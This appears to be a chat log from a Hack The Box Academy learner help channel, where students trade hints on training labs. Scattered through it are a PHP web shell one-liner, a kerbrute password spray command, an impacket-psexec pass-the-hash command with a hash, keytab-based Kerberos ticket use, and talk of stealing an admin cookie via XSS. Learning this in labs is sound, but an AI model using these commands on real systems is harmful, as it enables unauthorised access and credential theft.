I am doing "PHP Wrappers" section of "File Inclusion" module: https://academy.hackthebox.com/module/23/section/253. The question asks us to gain RCE using the wrappers taught on the section. I checked for allow_url_include settings in the PHP configuration file for Apache. However, there is no explicit setting to enable that. By default, it is disabled. I also checked for expect extension, but that is also not present. Doesn't this mean that we cannot gain RCE using the wrappers taught in the section?

You can get rce

But why? The section starts with the premise that allow_url_include should be enabled.

And it is

https://academy.hackthebox.com/module/216/section/2301 - Is there suppose to be any additional steps for "Detection Example 2 Detecting Unmanaged PowerShell". I've gotten my spoolsv.exe from an unmanaged stated to managed however, sysmon logs doesn't show event ID 7. just 8, etc

make sure you configured Sysmon to log Event ID 7

Right. Turns out I was just taking a small snippet of base64 string

Configured as in within the event viewer itself? Currently that is what I have my eyes on once it pops

just re-reading to see where I fucked up

It's generally why it's recommended to open the page in source view to copy it

configured within the Sysmon configuration file

gotcha, thank you

I'm just staring at the module today

hello guys i got stuck here in the linux fundemenatls module and i want some help but clicking on enable step by step guide or cheat sheet does nothing
anyone know what's wrong?

Enable step-by-step solution is available for yearly plan subscribers only

On Server Side attacks - identifying ssrf which i'm doing again I can only find a flag on ||port 8000 which gives me a flag but the answer is ..**|| which i can't find anywhere. What am i missing?

oh damn that is unlucky, i have a student plan active i thought it would be available for students as well :/

Cheatsheet is accessible for everyone, dont know what happened to yours

im not sure either clicking on it does nothing also the Terminate button clicking on it also does nothing

good morning ....I don’t understand why it keeps rejecting my answers—I don’t think they’re wrong.

can someone help me please?

What module?

it's seems like a browser issue...

linux fundamental

Tried refreshing the browser page?

If you are sure its right answer make sure youre input is correct, sometimes it can be writing. otherwise the answer is just not right.

in this moment i use chrome browser

yea im using brave and it did not work on it
tried google chrome and it works fine

I typically use Firefox for most especially when using things like burpsuite there are extensions that make it easy to setup and I never faced any problems with the hack the box site inserting answers

got it fixed on brave as well, apparently brave blocked it and i just tured that feature off

But I think it’s a personal preference, chrome used to have some good osint extensions not sure if they still work though things change quick

the question is this Which kernel version is installed on the system? (Format: 1.22.3) the answer of my bash is 1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19), i write 6.5.13 in the box, and result is wrong....why???

Hi everyone, for 2 weeks I have been stuck on the Advanced XSS and CSRF Exploitation module
Section: XSS Filter Bypasses. I found a filter bypass but impossible to retrieve the information from the admin. I tried everything demonstrated in the module content but without success. Does anyone have some time to give me a clue? Many thanks in advance

It asks for (Format: 1.22.3) in the question.

Does it give you a format it wants it in?

Did you log in to the target machine via SSH? I think this is the kernel version of your pwnbox.

can someone help with this question? im actually stuck and can't figure it out

did you try curl --help?

Use the pwnbox given to you in htb and if you don’t know how to get the source (it normally gives you the info in the module), you can literally google it and it’ll direct you if you are really stuck

Module - Footprinting, processes are included in the footprinting methodology, but i dont understand this, how can you identify the process ID during enumeration, What exactly are we looking for here?

I posted this last night but the forum is busier with different people than last night anyone manage to complete the information gathering - web edition module?

Is there any pre-cursor module or resource anyone knows of to help with the DNS Zone Transfer section of Information Gathering- web edition. I managed to use dig to get an ns record but I just want to fully understand the concept and all other examples online use the digi ninja example. I asked a few days ago and I have read articles and it just isn’t clicking

Appreciate any guidance in this area

curl -s https://www.targetwebsite.com/ | tr " " "\n" |  grep -oE 'https://([^"#]+)' |sort -u```

i did this command but nothing showed up

then your grep command is wrong

also you got the wrong url in there

i write 6.5.13, I write Format: 6.5.13 but it's wrong

#modules message

ok

I responded both in this format 6.5.13 and as format: 6.5.13 but it always tells me it's incorrect.

could you please post a screenshot of the command output in between spoiler tags? If it tells you "incorrect" most of the time the answer is wrong.

┌─[eu-free-1]─[10.10.14.48]─[g3h3r0@htb-dpxdcw8zfx]─[~]
└──╼ [★]$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 6.5.13-1parrot1 (2023-12-19)
It keeps telling me that the answer is wrong even on other questions.

Did you log in to the target machine via SSH?

i'll check it

no

Hi can i DM you on this?

Do it and you'll get the right answer.

My SpwBox session has expired; I’ll try again tomorrow. In the meantime, thank you.

On Windows Fundamentals, what ip do I put down for targetip when I use xfreerdp

Sure, but I'm not sure I remember much of what I did 😅

You can spawn the target at the bottom of the section.

yes but what Ip do I use as targetip in the linux terminal

😅 Let give it a shot

wait.. Im stupid sorry 💀

why not create a VM on your personal desktop and use an OpenVPN connection?

good day everyone. I am having issues with module active directory enumeration and attack
section: internal password spraying from Linux
question: Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer.
what i have tried:

I got 56 users from the previous question and saved it unto a file in the USP format (sbrown@inlanefreight.local). Then used the list of users with Welcome1 for a password spray and i keep getting this error

┌─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_names_domain Welcome1

2024/09/05 06:19:38 > [!] bdavis@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type

any hints on how to move from one user to another on skill assesment 2 password attacks ?

Windows Event Logs & Finding Evil

xan not connet to any target vm rdp stops working after first successful connection reseting

Have you tried adding --downgrade to your kerbrute command?

Change your vpn to tcp

i just did, got a hit however it is not the answer to the question. i could look through the user and find the one starting with s but i don't think that's the intended solution htb had in mind

Can you dm me what user you found?

On Windows Fundamentals
under NTFS vs. Share Permissions
When I use smbclient -L serverip -U htb-student

where serverip is the target machine

The parrot terminal gives an error of NT_STATUS_IO_TIMEOUT

Does anyone know what Im doing wrong?

Can I dm you?

does anyone know how to fix?

did that and still same issue

you either need to turn off your firewall

or create an outbound rule for the SMB port

which is port 445

it should be smth like this
iptables -A OUTPUT -p tcp --dport 445 -j ACCEPT

turn off firewall on the windows machine right

on your VM/pwnbox

or if the issue persist then yes on the windows machine too

nah it was on the windows machine, since thats what I wanted to connect on

sometimes its your VM messing up and most of the time its windows machine

yes exactly

in my case I had to do both

Windows Firewall has 3 options
Domain Private and Public, which one do I turn off (for this instance I turned off all of them, but in a future case I wouldn’t want to do that)

Has anyone done the module on exchange servers?

well we surely aren't in the Domain, so not that one. Private if we are on the local network. Public if we are doing smth externally

so private it is for now

can somebody answer this please

Do any of you sometimes redue the modules just to reinforce what you have already learned

Hello currently stuck on Password attack/Pass the Ticket (PtT) from Linux , The last question i use the tools linikatz.sh i'm already root in the target system, any hint?

If I remember correctly you will find a ticket where linux store tickets, export the ticket and access the share at \DC01\linux01

I think is the keytab

all tickets for other users that i found are in /tmp

but cant find for linux01

/etc/krb5.keytab?

Do flags change over time in the modules because I'm redoing some modules but not finding the same flags?

I don't think so, redid some skills assessment and everything was the same

Hmm ok

probably i should crack it

If you have the ntlm I think you can do a pth

or overpass the hash to get a ticket

hello can someone help me with this idk why its not working

python xsstrike.py

XSStrike v3.1.5

[!] fuzzywuzzy isn't installed, installing now.
error: externally-managed-environment

× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.

If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.

If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.

See /usr/share/doc/python3.11/README.venv for more information.

note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system- hint: See PEP 668 for the detailed specification.
[-] fuzzywuzzy installation failed.

you need to disable a config on your python or use virtual env, to disable I don't remember

are you using kali or parrot?

parrot

ok

apt install pipx
pipx install some-python-application

or

python3 -m venv .
source ./bin/activate

I prefer venv since you create a virtual env and everything related to python is in a specific env that does not conflict with your system

Linux privilege escalation
Shared OBject Hijacking
I just wanted to ask is it possible to perforom this type of attack in dedicated lab, because when I tried to replace library i couldn't do that due to permission denied

tried but didnt work

gooood

can you provide me the command? just to check

||impacket-psexec linux01@10.129.201.126 -hashes :5aa7d65408b1c36bb2d0892b8e53bce8||

i put nothing before : as dont need

but the question is talking about the ticket not the hash so i think i'm going for the NOT right way

There's no file named like krb5cc_1000 or something similar in /tmp ?

Oh nvm, it's the LINUX01$ machine account. They were right. Keytab it is

I think you forgot the $, domain/'linux01$'@<ip> -hashes :<hash>

nothing work

I will try that again when I come back at my pc

Might also try https://github.com/TarlogicSecurity/tickey while you're at it

nice

Password attacks Skill-hard any idea why it doesnt return a hash ?

what?

I thought you got the flag, sorry lol

Where are you getting permission denied? Maybe you're writing to the wrong directory. The permissions you have allows you to create new files or directories, rename or delete existing files and directories.

EDIT: Yes, you get permission denied if you follow exactly what module show, however you can overcome this.

actually i never stuck so hard lol

@solid quarry @chrome hawk GOD finally ahahahhaa

Hello, is it possible to unlock the academy’s tier 3 modules? With unlimited access as well as the student, is it possible with monthly subscriptions? 👀

The NThash worked?

Can someone explain to me why it doesnt work with the first one but does with the second ?

or was it tickey?

||Not i used kinit linux01@INLANEFREIGHT.HTB -k -t /etc/krb5.keytab but without @ only linux01$||

||kinit LINUX01$ -k -t /etc/krb5.keytab||

cool

Anyone for a nudge on the Whitebox Pentesting 101 Skills Assessment? Stuck trying to get something to work

nice

Anyone can give me a hint ?

@valid nebula Did it a while ago, as far as I remember it wasn't that complicated, changing cases and using img was probably enough

Thanks ... I will try something more simple because I'm trying tricky things with multiple XmlHTTPRe... I manage to bypass the filter and exfiltrate hardcoded data but I'm lost at where the flag can be located ... maybe I will try a simple image and expect the cookie will be sent and not blocked by CORS

You can only do the first technique the other techniques are impossible

The /usr/lib/python3.8 directories are not available in writing so it is impossible to do the library path technique

He is referring to: "Shared Object Hijacking"

Ahhh sorry

https://academy.hackthebox.com/module/113/section/2164
Module Exploiting Web Vulnerabilities in Thick-Client Applications
How critical is it that I don't have the Internet on this machine? or how do I turn it on.

I misread

Maybe you’re having trouble compiling the application

Well, the rest of the functions work except for displaying these files.

What stage are you at exactly So that I can direct you

I compiled the file for the first time. To go under the QTC data and everything works in my application after one file and I don't know how critical it is. FileBrowser -> Notes.txt reveals the file security.txt. only it does not work.

now it works okay =p

hello guys, im just getting started in academyand i can't seem to unlock the modules when i click the button. I have 70 Cube and module costs 10 Cube any tip?

Ok I was going to tell you did you compile the application well with this command C:> jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *

But very well if it works

I don’t know how to help you but try to see with the support I think they are more competent at this level

ok ty

what do ya know, it's gonna be an AD cert

is this gonna be a me issue?

Hi! Does anyone know if the HTB command will create a job path for Cloud and Mobile Penetration testers in the future?

all I know is that I’m gonna try to save $700 to unlock it ahah

https://academy.hackthebox.com/module/80/section/837

I have no idea about What is one prominent issue with passwords? in this module.
Can someone please help me? 🥺

Use /feedback to state your wishes.
There are no cloud or mobile pentesting modules yet, but nobody knows HTB's plans

no, student is only from tier0 to tier2. The idea behing is that up to tier2 there are skills that any junior pentester or student should have. Tier3 and above are for more |professionals" so they are not incuded.

You're probably using NAT network setting on your VM right?

No its from the academy pwnbox launcher

After writing the ip in RDP it showed me this

becarful your screenshot contains a spoiler are you activated your vpn

Now I need to perform?
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java
cp fatty-client-new.jar raw\fatty-client-new-2.jar
mv -Force fatty-client-new.jar.src\htb\fatty\client\methods*.class raw\htb\fatty\client\methods
jar -cmf META-INF\MANIFEST.MF traverse1.jar .

no but i downloaded PwnBox idk if its active or not

and its not spoiler i am not giving amswer

you need to install openvpn on your host to activate the vpn so that it can communicate with the remote ip or if you're on linux sudo openvpn academy-regular.ovpn and use xfreerdp

so it works well as a transversal path ?

but i have problem after changing only the GUI, everything is fine but when I do the same and Invoke changes, I lose some of the files.

OK thx bro

don't forget to import the lib java.io.FileOutputStream and import java.io.IOException when you make your modification, which will help you to download the file
and also what took me 2 days to understand is that you need to combine the 2 techniques you've learned to download the file correctly, so import what you've done in /gui/clientguitest and /methods/Invoker to compile your binary correctly.

It was just that nothing was written about the second import.
import java.io.IOException

yeah, but it's in throws, and when I was doing my research I added it because it often failed at compile time.

Good luck because I bit my fingers on this section, it is a level insane that refers to the fatty box

I can't say that it is very difficult. It's just that you can't be very distracted in it and do everything step by step. But it is long, that's for sure.

can someone help me understand why heredocs is stripping my $_REQUEST? do i need to escape it?

└──╼ [★]$ cat << EOF > wtf.php
> <?php system($_REQUEST['cmd']); ?>
> EOF
┌─[us-academy-5]─[10.10.14.158]─[htb-ac-291030@htb-u817zm90co]─[~]
└──╼ [★]$ cat wtf.php 
<?php system(['cmd']); ?>
┌─[us-academy-5]─[10.10.14.158]─[htb-ac-291030@htb-u817zm90co]─[~]
└──╼ [★]$ 

in the previous section the lab did not escape any chars when demoing heredocs for quick file creation...

Just escape the $ and maybe the _

Or edit and add it in

ok this is quite odd <_>''

¯_(ツ)_/¯

The probably forgot to add the relevant fix

At least you noticed it

no its happening on my baremetal machine as well

actuallys its happening even worse on baremetal

I meant the relevant fix to adjust it

╰─ cat << EOF >> wtf.php                                                     ─╯
heredoc> <?php system($_REQUEST["cmd"]); ?>
heredoc> EOF

╭─ /dev/shm ················································· ✔  10:46:23 ─╮
╰─ cat wtf.php                                                               ─╯
<?php system(); ?>

i wonder if HEREDOCs should only be used with bash? im using zsh and i think pwnbox uses something other than bash as well?

Pwnbox uses bash

ah ok

They likely just forgot to include the adjustment

It's likely because you're still in shell, so $ is still being used as a variable call

yeah i think escaping it worked but i got some werid shit cuz i was russian so i just jettisoned it for nano

Be smarter than your shell

what should i do in such situation?

Helps to know what module and section you're working on

Linux privilege escalation
Sudo

Haxmeasandwich isn't the vector

oh, okay thanks for that!

i got a problem that i just upgrade my monthly plan from gold to plat but i didnt receive my 500 cubes

Look what your user can(t) sudo

any staff

Reach out to support on the website

ahahI'm at the same level

It's way simpler than it looks, man pages and such ftw

Well only they can help you

So exercise patience. Support isn't paid to monitor the discord

It's the same

how so?

The head tags are collapsed in inspector

look at the form, diff values?

did u see that part?

? You mean the header inserted by the darkreader plugin?

no, the html form for uploading the file to the server, its totally different

ignore the highlighted part in the console that was just default selected

Also upload attacks is a t2 module, so careful with sharing screenshots on it

oh, maybe dev console is just rearranging the tags?

man this is confusing ive never actually seen it do this before

Maybe, but I didn't notice a difference on the code

the tags are out of order in the source and dev console isnt even reogranizing them alphabetically or anything its just... different

oh the code in the walk thru is diff too, doesnt mirror the damn exercise.

btw you mentioned something about sharing stuff from t2, im still kinda new to all this whats that mean?

T2 module, tier 2

yeah i gather that, but what is tier 2? like a job path?

...

It's the rating

Like t0 being fundamentals

oh ok, didnt realize there was ratings. i see them now

T1 being some basic tooling

T2 being more advanced

T3 being very advanced

so only t0 and t1 are allowed to share screenshots?

And t4 being wtf

Only t0 really

As t1+ modules are paid

ah, got it

Hey

Hi I'm new

Good afternoon

This isn't #general , in order to chat there read and follow #welcome

I am too

If you're looking for how to get started

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I've read them all

Is this a server for hackers?

Did you follow the instructions in #welcome ?

I think so

#welcome and #rules

New PATH LETS GOOO!

yes

If you did you would be able to talk in #general

I want to learn hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

.

https://tenor.com/view/dazed-and-confused-matthew-mc-gif-22598466

man they all came out the woodwork at once or what.

I'm still creating an account

👍

What is this

AD path looks great, but i'll probably slow down on the modules after CWEE